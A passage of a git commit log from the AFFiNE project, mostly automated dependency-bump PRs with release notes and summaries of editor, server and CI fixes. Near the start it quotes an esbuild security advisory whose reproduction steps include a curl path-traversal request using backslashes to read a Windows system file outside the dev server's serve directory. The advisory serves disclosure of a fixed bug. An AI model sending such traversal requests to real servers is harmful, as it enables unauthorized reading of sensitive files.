			if entries, err, _ := h.fs.ReadDirectory(absDir); err == nil {
				if entry, _ := entries.Get(h.fs.Base(absPath)); entry != nil && entry.Kind(h.fs) == fs.FileEntry {
	....				
```

##### Steps to reproduce

```
npm install --save-exact --save-dev esbuild

echo "console.log(1)" > app.js

.\node_modules\.bin\esbuild --version
0.27.3

.\node_modules\.bin\esbuild app.js --bundle --outdir=www --servedir=www --watch

curl -i --path-as-is "http://localhost:8000/..\..\..\..\..\..\..\Windows\system.ini"
<content of Windows\system.ini>
```

##### Impact

- Arbitrary file read on Windows
- Exposure of sensitive files

#### Severity
- CVSS Score: 2.5 / 10 (Low)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N`

#### References
-
[https://github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr)
-
[https://github.com/evanw/esbuild/releases/tag/v0.28.1](https://redirect.github.com/evanw/esbuild/releases/tag/v0.28.1)
-
[https://github.com/advisories/GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-g7r4-m6w7-qqqr)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>evanw/esbuild (esbuild)</summary>

###
[`v0.28.1`](https://redirect.github.com/evanw/esbuild/blob/HEAD/CHANGELOG.md#0281)

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.28.0...v0.28.1)

- Disallow `\\` in local development server HTTP requests
([GHSA-g7r4-m6w7-qqqr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-g7r4-m6w7-qqqr))

This release fixes a security issue where HTTP requests to esbuild's
local development server could traverse outside of the serve directory
on Windows using a `\\` backslash character. It happened due to the use
of Go's `path.Clean()` function, which only handles Unix-style `/`
characters. HTTP requests with paths containing `\\` are no longer
allowed.

Thanks to [@&#8203;dellalibera](https://redirect.github.com/dellalibera)
for reporting this issue.

- Add integrity checks to the Deno API
([GHSA-gv7w-rqvm-qjhr](https://redirect.github.com/evanw/esbuild/security/advisories/GHSA-gv7w-rqvm-qjhr))

The previous release of esbuild added integrity checks to esbuild's npm
install script. This release also adds integrity checks to esbuild's
Deno install script. Now esbuild's Deno API will also fail with an error
if the downloaded esbuild binary contains something other than the
expected content.

Note that esbuild's Deno API installs from `registry.npmjs.org` by
default, but allows the `NPM_CONFIG_REGISTRY` environment variable to
override this with a custom package registry. This change means that the
esbuild executable served by `NPM_CONFIG_REGISTRY` must now match the
expected content.

Thanks to [@&#8203;sondt99](https://redirect.github.com/sondt99) for
reporting this issue.

- Avoid inlining `using` and `await using` declarations
([#&#8203;4482](https://redirect.github.com/evanw/esbuild/issues/4482))

Previously esbuild's minifier sometimes incorrectly inlined `using` and
`await using` declarations into subsequent uses of that declaration,
which then fails to dispose of the resource correctly. This bug happened
because inlining was done for `let` and `const` declarations by avoiding
doing it for `var` declarations, which no longer worked when more
declaration types were added. Here's an example:

  ```js
  // Original code
  {
    using x = new Resource()
    x.activate()
  }

  // Old output (with --minify)
  new Resource().activate();

  // New output (with --minify)
  {using e=new Resource;e.activate()}
  ```

- Fix module evaluation when an error is thrown
([#&#8203;4461](https://redirect.github.com/evanw/esbuild/issues/4461),
[#&#8203;4467](https://redirect.github.com/evanw/esbuild/pull/4467))

If an error is thrown during module evaluation, esbuild previously
didn't preserve the state of the module for subsequent module
references. This was observable if `import()` or `require()` is used to
import a module multiple times. The thrown error is supposed to be
thrown by every call to `import()` or `require()`, not just the first.
With this release, esbuild will now throw the same error every time you
call `import()` or `require()` on a module that throws during its
evaluation.

- Fix some edge cases around the `new` operator
([#&#8203;4477](https://redirect.github.com/evanw/esbuild/issues/4477))

Previously esbuild incorrectly printed certain edge cases involving
complex expressions inside the target of a `new` expression
(specifically an optional chain and/or a tagged template literal). The
generated code for the `new` target was not correctly wrapped with
parentheses, and either contained a syntax error or had different
semantics. These edge cases have been fixed so that they now correctly
wrap the `new` target in parentheses. Here is an example of some
affected code:

  ```js
  // Original code
  new (foo()`bar`)()
  new (foo()?.bar)()

  // Old output
  new foo()`bar`();
  new (foo())?.bar();

  // New output
  new (foo())`bar`();
  new (foo()?.bar)();
  ```

- Fix renaming of nested `var` declarations
([#&#8203;4471](https://redirect.github.com/evanw/esbuild/issues/4471))

This release fixes a bug where `var` declarations in nested scopes that
are hoisted up to module scope were not correctly being renamed during
bundling. That could previously lead to name collisions when
minification was disabled, which could potentially cause a behavior
change. The bug has been fixed so that these hoisted declarations are
now considered to be module-level symbols during the name collision
avoidance pass.

- Emit `var` instead of `const` for certain TypeScript-only constructs
for ES5
([#&#8203;4448](https://redirect.github.com/evanw/esbuild/issues/4448))

While esbuild doesn't generally support converting `const` to `var` for
ES5 due to nested scoping rules (which is currently a build-time error),
esbuild previously incorrectly converted TypeScript-only `import`
assignment constructs into a `const` declaration even when targeting
ES5. With this release, esbuild will now use `var` for this case
instead:

  ```js
  // Original code
  import x = require('y')

  // Old output (with --target=es5)
  const x = require("y");

  // New output (with --target=es5)
  var x = require("y");
  ```

### [`v0.28.0`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.7...v0.28.0)

### [`v0.27.7`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.5...v0.27.7)

### [`v0.27.5`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.4...v0.27.5)

### [`v0.27.4`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.3...v0.27.4)

### [`v0.27.3`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.2...v0.27.3)

### [`v0.27.2`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.1...v0.27.2)

### [`v0.27.1`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.27.0...v0.27.1)

### [`v0.27.0`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.26.0...v0.27.0)

### [`v0.26.0`]()

[Compare
Source](https://redirect.github.com/evanw/esbuild/compare/v0.25.12...v0.26.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMTkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIxOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-18 17:41:44 +08:00
DarkSky 154d9e975d fix: deps & config (#15126) 2026-06-18 14:41:48 +08:00
renovate[bot] 24e07f73bb chore: bump up capacitor-plugin-app-tracking-transparency version to v3 (#15079)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[capacitor-plugin-app-tracking-transparency](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency)
| [`^2.0.5` →
`^3.0.0`](https://renovatebot.com/diffs/npm/capacitor-plugin-app-tracking-transparency/2.0.5/3.0.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/capacitor-plugin-app-tracking-transparency/3.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/capacitor-plugin-app-tracking-transparency/2.0.5/3.0.0?slim=true)
|

---

### Release Notes

<details>
<summary>mahnuh/capacitor-plugin-app-tracking-transparency
(capacitor-plugin-app-tracking-transparency)</summary>

###
[`v3.0.0`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/releases/tag/v3.0.0)

[Compare
Source](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/compare/v2.0.5...v3.0.0)

- Add support for Swift Package Manager
([#&#8203;29](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/issues/29))
[`40051d6`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/40051d6)
- Update README.md
[`d8c4d27`](https://redirect.github.com/mahnuh/capacitor-plugin-app-tracking-transparency/commit/d8c4d27)

***

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-06-18 13:00:42 +08:00
DarkSky d500e472f0 chore: bump deps (#15124) 2026-06-18 12:55:18 +08:00
DarkSky 13d9fe506e feat(native): cleanup vendored deps (#15119)
#### PR Dependency Tree


* **PR #15119** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Breaking Changes**
* Removed major Rust public APIs related to document/CRDT encoding,
synchronization, and document loading from the affected packages.
* **Chores**
* Migrated internal dependency usage to published crates and trimmed the
Rust workspace/feature surface.
* **CI/CD**
* Simplified the Rust CI pipeline by removing advanced testing jobs and
updating job dependencies.
* **Dev/Test/Bench**
* Removed associated benchmark and fuzzing artifacts and related
fixture/test utilities.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-18 02:55:30 +08:00
DarkSky 1256d66938 fix(server): sync permission check (#15123)
fix #15121



#### PR Dependency Tree


* **PR #15123** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Security Improvements**
* Enforced document-level `Doc.Read`/`Doc.Update` checks for key sync
websocket operations, including filtering workspace doc timestamp
results to only readable documents.
* Improved remote permission handling: once a remote denies access,
syncing stops for the affected document and retry behavior is
suppressed.
* **Improvements**
* `delete-doc` now relies on server acknowledgment and returns an
explicit `{ success: true }`.
* Websocket acknowledgment errors are now normalized for consistent
error details.
* **Tests**
* Expanded permission-denied and websocket error-handling coverage,
including timestamp filtering and no-retry behavior after permission
denial.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-18 02:43:25 +08:00
DarkSky da7781a751 feat(mobile): improve android edgeless & ci (#15118)
#### PR Dependency Tree


* **PR #15118** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Improved mobile CI workflow with change-aware Android/iOS build jobs
and updated completion dependencies so tests wait for the relevant
mobile builds.
* **Performance / App Behavior**
* Enhanced Android WebView behavior: improved viewport/WebView tuning,
disabled zoom and scrollbars, and made mixed-content allowance
environment-aware (debug vs non-debug).
* Adjusted Android cleartext traffic handling based on build/debug
settings and Capacitor server URL configuration.
* **Tests**
* Strengthened Electron BYOK storage tests with per-test temporary
directories, mock control, and added coverage for when secure storage is
unavailable.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-17 02:08:15 +08:00
keepClamDown a77d89bb1a fix(editor): edgeless can't slider with finger (#15091)
fix bug edgeless can't slider with finger 

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added mobile immersive edgeless mode with dynamic chrome auto-hide and
tap-gesture controls.
  * Added a mobile zoom ruler UI for edgeless.
* **Bug Fixes**
* Improved iOS rendering/zoom by applying low-zoom survival behavior,
gesture-aware refresh deferral, and effective-DPR canvas scaling.
* Fixed iOS webview zoom/bounce and process-termination reload behavior.
  * Improved placeholder styling with theme-aware colors.
* **Chores**
  * Updated local ignore rules and iOS app build/version configuration.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-06-16 21:19:31 +08:00
YashTomar2201 c51bdb74de fix: resolve renovate configuration validation error (#15104)
Fixes #15101 

### What this PR does
Resolves a Renovate configuration error where the bot stopped processing
PRs due to invalid settings in `.github/renovate.json`.

### The Bug
The 4th rule in the `packageRules` array was combining the `*` wildcard
with negated regex patterns (`!/^@blocksuite//`, `!/oxlint/`) inside the
`matchPackageNames` field, which violates Renovate's current validation
schema.

### The Fix
* Kept the `*` wildcard isolated inside `matchPackageNames`.
* Extracted the negative lookaheads and moved them to their dedicated
`excludePackagePatterns` array.
* Cleaned up the regex formatting for the exclusion patterns.

*Note: This configuration was successfully verified locally using `npx
renovate-config-validator`.*

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Refined dependency update configuration: broadened the non-major npm
package rule to apply to all packages while explicitly excluding
selected packages from automated updates.
* Adjusted exclusion patterns to replace prior negation-based logic with
clearer exclusion entries for specific packages.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-15 17:26:10 +08:00
Juan Abimael Santos Castillo ac3c93ccfa fix(editor): render strikethrough on links (#15109)
**Issue**

Strikethrough on a link doesn't render. The toolbar button highlights
but no line
appears (#15106).

**Solution**

affine-link hardcoded text-decoration: none in the override it passes to
affineTextStyles, which clobbered the decoration computed from
strike/underline.
Removing it fixes the render; plain links still show no underline
because
affineTextStyles returns none by default.

**Result**

Strikethrough and underline render on links again. Added an e2e test: a
plain link
stays undecorated, a struck link renders line-through, red before the
fix and green
after.

fix #15106

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Fixed link text-decoration styling to properly support strikethrough
and other text formatting when applied to links.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-14 19:34:36 +08:00
DarkSky 6a2b73e76f feat(editor): improve database & table behavior (#15100)
fix #14982
fix #15028
fix #15099

#### PR Dependency Tree


* **PR #15100** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Prevented Enter handling during IME composition to avoid unintended
input.
* Avoided overwriting external native selections when interacting with
tables.
* Improved validation of inline text selection ranges for more reliable
behavior.

* **Enhancements**
* Scoped and refined text-selection styling and editability within
tables and cells.
  * Added managed sorting for Kanban views to control card ordering.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-11 13:50:23 +08:00
DarkSky 07a08e6d4d fix(editor): import & save logic (#15098)
fix #15080
fix #15085
fix #15031
fix #15094


#### PR Dependency Tree


* **PR #15098** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
  * Improved code-block paste behavior for plain-text insertion
  * Fixed block selection ordering to reflect document model
  * Made table cell formatting resilient to conversion errors
  * Ensured user feature list is consistently returned as an array

* **Refactor**
  * Streamlined authentication session fetch and profile enrichment flow

* **Tests**
  * Added tests for markdown blockquote list preservation
  * Added authentication session validation tests
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-10 22:43:31 +08:00
Talha Mujahid 6faebcabd3 fix(editor): prevent backspace in icon picker search from deleting editor content (#15089)
## Problem
When the callout block's icon picker is open and the user types in the
search input, pressing backspace deletes content in the main editor
instead of the search text.

## Root Cause
The callout icon picker is mounted via `createPopup` inside
`editor-host`. `PageKeyboardManager` registers a global `Backspace`
handler on the editor host (`keyboard-manager.ts`) with `{ global: true
}`, which fires on every backspace keydown regardless of what element is
focused. Without `stopPropagation`, the backspace event from the search
input bubbles up through the DOM and triggers block deletion.

Other keys are unaffected because the editor handles character input
through `contenteditable` focus, those handlers only act when a
contenteditable node is active.

## Fix
Add `onKeyDown` with `e.stopPropagation()` to the search inputs in both
`EmojiPicker` and `AffineIconPicker`. This matches the existing pattern
already used by `MenuComponent` (`menu-renderer.ts:107`) and all other
interactive components (`date-picker`, `inline-edit`, `prompt-modal`).

## Why not affected elsewhere
`DocIconPicker` uses the same pickers but wraps them in a Radix UI
`Menu` with `modal: true`, which portals outside `editor-host` — so
backspace events never reach the editor's global handler there.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved keyboard event handling in search inputs for icon and emoji
pickers

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-10 16:13:04 +08:00
DarkSky d10dd12663 fix(core): transport may not available (#15087)
fix #15086


#### PR Dependency Tree


* **PR #15087** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Console logging is now disabled in production builds to reduce
unnecessary log output, while remaining enabled in development for
debugging purposes.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-06 18:32:54 +08:00
renovate[bot] edc87e38df chore: bump up RevenueCat/purchases-ios-spm version to from: "5.76.0" (#15077)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm)
| minor | `from: "5.75.0"` → `from: "5.76.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm
(RevenueCat/purchases-ios-spm)</summary>

###
[`v5.76.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.75.0...5.76.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.75.0...5.76.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-04 16:39:11 +08:00
DarkSky 65c3271beb feat(server): clean up dirty data from legacy version (#15078)
#### PR Dependency Tree


* **PR #15078** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * Persist and replay incoming payment webhooks for reliability.
* Track provider-level subscriptions, payment events, and per-target
trial usage across providers.
  * Nightly replay job to reprocess stuck payment events.
* Shadow backfill mode and emit-suppression options to control
projection/backfill side effects.
  * Subscriptions now derived from entitlements + provider facts.

* **Bug Fixes**
* Improved error propagation, retry tracking, and safer owner-grant
projection handling.

* **Tests**
* Added webhook failure/replay, provider integration, entitlement
projection, and trial/checkout tests.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-04 16:38:44 +08:00
renovate[bot] 489702eb66 chore: bump up actions/github-script action to v9 (#15074)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
|
[actions/github-script](https://redirect.github.com/actions/github-script)
| action | major | `v8` → `v9` |

---

### Release Notes

<details>
<summary>actions/github-script (actions/github-script)</summary>

###
[`v9.0.0`](https://redirect.github.com/actions/github-script/releases/tag/v9.0.0)

[Compare
Source](https://redirect.github.com/actions/github-script/compare/v9.0.0...v9.0.0)

**New features:**

- **`getOctokit` factory function** — Available directly in the script
context. Create additional authenticated Octokit clients with different
tokens for multi-token workflows, GitHub App tokens, and cross-org
access. See [Creating additional clients with
`getOctokit`](https://redirect.github.com/actions/github-script#creating-additional-clients-with-getoctokit)
for details and examples.
- **Orchestration ID in user-agent** — The `ACTIONS_ORCHESTRATION_ID`
environment variable is automatically appended to the user-agent string
for request tracing.

**Breaking changes:**

- **`require('@&#8203;actions/github')` no longer works in scripts.**
The upgrade to `@actions/github` v9 (ESM-only) means
`require('@&#8203;actions/github')` will fail at runtime. If you
previously used patterns like `const { getOctokit } =
require('@&#8203;actions/github')` to create secondary clients, use the
new injected `getOctokit` function instead — it's available directly in
the script context with no imports needed.
- `getOctokit` is now an injected function parameter. Scripts that
declare `const getOctokit = ...` or `let getOctokit = ...` will get a
`SyntaxError` because JavaScript does not allow `const`/`let`
redeclaration of function parameters. Use the injected `getOctokit`
directly, or use `var getOctokit = ...` if you need to redeclare it.
- If your script accesses other `@actions/github` internals beyond the
standard `github`/`octokit` client, you may need to update those
references for v9 compatibility.

##### What's Changed

- Add ACTIONS\_ORCHESTRATION\_ID to user-agent string by
[@&#8203;Copilot](https://redirect.github.com/Copilot) in
[#&#8203;695](https://redirect.github.com/actions/github-script/pull/695)
- ci: use deployment: false for integration test environments by
[@&#8203;salmanmkc](https://redirect.github.com/salmanmkc) in
[#&#8203;712](https://redirect.github.com/actions/github-script/pull/712)
- feat!: add getOctokit to script context, upgrade
[@&#8203;actions/github](https://redirect.github.com/actions/github) v9,
[@&#8203;octokit/core](https://redirect.github.com/octokit/core) v7, and
related packages by
[@&#8203;salmanmkc](https://redirect.github.com/salmanmkc) in
[#&#8203;700](https://redirect.github.com/actions/github-script/pull/700)

##### New Contributors

- [@&#8203;Copilot](https://redirect.github.com/Copilot) made their
first contribution in
[#&#8203;695](https://redirect.github.com/actions/github-script/pull/695)

**Full Changelog**:
<https://github.com/actions/github-script/compare/v8.0.0...v9.0.0>

###
[`v9`](https://redirect.github.com/actions/github-script/compare/v8...v9)

[Compare
Source](https://redirect.github.com/actions/github-script/compare/v8.0.0...v9.0.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-04 07:44:53 +08:00
renovate[bot] e3349b458c chore: bump up apple-actions/import-codesign-certs action to v7 (#15075)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
|
[apple-actions/import-codesign-certs](https://redirect.github.com/apple-actions/import-codesign-certs)
| action | major | `v6` → `v7` |

---

### Release Notes

<details>
<summary>apple-actions/import-codesign-certs
(apple-actions/import-codesign-certs)</summary>

###
[`v7.0.0`](https://redirect.github.com/Apple-Actions/import-codesign-certs/releases/tag/v7.0.0)

[Compare
Source](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v7.0.0...v7.0.0)

#### What's Changed

- Switch from `ncc` to `esbuild`
- Bump flatted from 3.4.1 to 3.4.2 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[Apple-Actions#166](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/166)
- Bump actions/setup-node from 6.2.0 to 6.3.0 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[Apple-Actions#167](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/167)
- Bump picomatch from 2.3.1 to 2.3.2 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[Apple-Actions#168](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/168)
- Bump knip from 5.78.0 to 6.2.0 by
[@&#8203;dependabot](https://redirect.github.com/dependabot)\[bot] in
[Apple-Actions#173](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/173)

**Full Changelog**:
<https://github.com/Apple-Actions/import-codesign-certs/compare/v6.1.0...v7.0.0>

###
[`v7`](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v6.1.0...v7.0.0)

[Compare
Source](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v6.1.0...v7.0.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-03 18:33:32 +08:00
renovate[bot] eb32a5894e chore: bump up @googleapis/androidpublisher version to v36 (#15063)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@googleapis/androidpublisher](https://redirect.github.com/googleapis/google-api-nodejs-client)
| [`^35.0.0` →
`^36.0.0`](https://renovatebot.com/diffs/npm/@googleapis%2fandroidpublisher/35.1.1/36.0.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@googleapis%2fandroidpublisher/36.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@googleapis%2fandroidpublisher/35.1.1/36.0.0?slim=true)
|

---

### Release Notes

<details>
<summary>googleapis/google-api-nodejs-client
(@&#8203;googleapis/androidpublisher)</summary>

###
[`v36.0.0`](https://redirect.github.com/googleapis/google-api-nodejs-client/blob/HEAD/CHANGELOG.md#13600-2024-05-02)

##### ⚠ BREAKING CHANGES

- **workloadmanager:** This release has breaking changes.
- **serviceusage:** This release has breaking changes.
- **servicenetworking:** This release has breaking changes.
- **serviceconsumermanagement:** This release has breaking changes.
- **securitycenter:** This release has breaking changes.
- **redis:** This release has breaking changes.
- **networkmanagement:** This release has breaking changes.
- **iam:** This release has breaking changes.
- **doubleclickbidmanager:** This release has breaking changes.
- **dns:** This release has breaking changes.
- **dataportability:** This release has breaking changes.
- **dataplex:** This release has breaking changes.
- **dataform:** This release has breaking changes.
- **contentwarehouse:** This release has breaking changes.
- **content:** This release has breaking changes.
- **compute:** This release has breaking changes.
- **beyondcorp:** This release has breaking changes.
- **alloydb:** This release has breaking changes.
- **aiplatform:** This release has breaking changes.

##### Features

- **accessapproval:** update the API
([88f6ef5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/88f6ef52f6b19a90962acb1604694da5e22af1d0))
- **admin:** update the API
([b6fff85](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6fff8553fc561f5c16d8bd46ded439bb793ea8a))
- **adsense:** update the API
([5349cf9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5349cf9808017b594380ade8c94aed81a3330ed2))
- **advisorynotifications:** update the API
([9c37105](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9c371058f141e1b30567a74d35245c0d116e9f02))
- **aiplatform:** update the API
([56cde03](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/56cde03e4eb6283561515ecac8435ad28f49dda9))
- **alertcenter:** update the API
([10d8698](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/10d869861c193788a3150515b2d8ec323517bc38))
- **alloydb:** update the API
([51ad37e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/51ad37ee97ac19ca26c26c645f39f8d9d3fde0cd))
- **analyticsadmin:** update the API
